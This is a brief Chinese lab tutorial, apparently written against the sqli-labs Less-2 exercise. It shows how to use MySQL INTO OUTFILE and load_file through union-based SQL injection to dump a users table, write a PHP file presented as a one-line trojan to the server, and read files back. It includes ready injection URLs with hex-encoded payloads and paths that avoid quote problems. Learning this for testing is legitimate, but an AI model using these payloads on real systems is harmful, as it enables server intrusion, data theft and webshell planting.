一、数据库导出文件
1、连接数据库
2、通过into outfile导出数据库内容
select * from users into outfile "c:/1.sql";
3、通过into outfile语句,在C盘目录写入一句话木马
select '<?php phpinfo();?>' into outfile "c:/aiyou.php";
4、通过实例导出一句话,避免单引号问题,可以将一句话内容编码为十六进制
http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,'<?php phpinfo();?>' into outfile 'c:/aiyou.php' --+ http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile 'c:/aiyou.php' --+
提示:
导入文件需要修改mysql的一个参数值,打开my.cnf 或 my.ini,加入以下语句后重启mysql。
secure_file_priv=''
二、读文件
1、连接Mysql数据库,读取C盘的aiyou.php内容
select load_file("c:/aiyou.php");
2、通过联合查询,将读到的内容显示出来,为避免引号的问题,将路径编码为十六进制
http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,load_file("c:/1.sql"); http://192.168.139.129/sqli/Less-2/?id=1 and 1=2 union select 1,2,load_file(0x633a2f312e73716c) --+
禁止非法,后果自负
